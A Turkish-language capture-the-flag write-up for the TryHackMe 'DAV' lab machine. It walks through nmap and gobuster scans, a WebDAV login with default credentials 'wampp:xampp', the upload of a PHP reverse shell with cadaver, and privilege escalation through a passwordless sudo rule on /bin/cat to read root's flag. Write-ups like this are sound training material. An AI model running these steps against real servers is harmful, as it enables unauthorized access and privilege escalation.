TryHackMe – DAV Makine Çözümü

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “DAV” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.85.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-06 22:55 +03
Nmap scan report for 10.10.85.16
Host is up (0.065s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

2 — “gobuster” aracını kullanarak dizin taramasını başlatıyorum.

[root:/home/alper/Desktop/TRYHACKME]# gobuster dir -u http://10.10.85.16 -w /usr/share/wordlists/dirb/common.txt     
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.85.16
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/06 23:14:48 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 299]
/webdav               (Status: 401) [Size: 458]
Progress: 4568 / 4615 (98.98%)
===============================================================
2023/06/06 23:15:18 Finished
===============================================================

3 — WEBDAV paneline “wampp:xampp” bilgileri ile girmeye çalışıyor. Düzgün yapılandırılmamış webdav paneline “cadaver” aracı ile php reverse shell yüklüyorum.

[root:/home/alper/Desktop/TRYHACKME]# cadaver http://10.10.85.16/webdav                                         
Authentication required for webdav on server `10.10.85.16':
Username: wampp
Password: 
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        passwd.dav                            44  Aug 26  2019
dav:/webdav/> put shell.pyp
Uploading shell.pyp to `/webdav/shell.pyp': Could not open file: No such file or directory
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 2354 bytes succeeded.
dav:/webdav/>

4 — Reverse shell bağlantısından sonra ilk bayrağımı elde ediyorum.

$ cd home
$ ls
merlin
wampp
$ cd merlin
$ ls
user.txt
$ cat user.txt
***CENSORED***

5 — “sudo -l” komutu ile sudo yetkisi ile çalıştırabileceğim komutları görüntülüyorum.

www-data@ubuntu:/home/merlin$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat

6 — Cat komutu sudo yetkisine sahip olduğu için root bayrağını da elde ediyorum.

www-data@ubuntu:/home/merlin$ sudo /bin/cat /root/root.txt
sudo /bin/cat /root/root.txt
***CENSORED***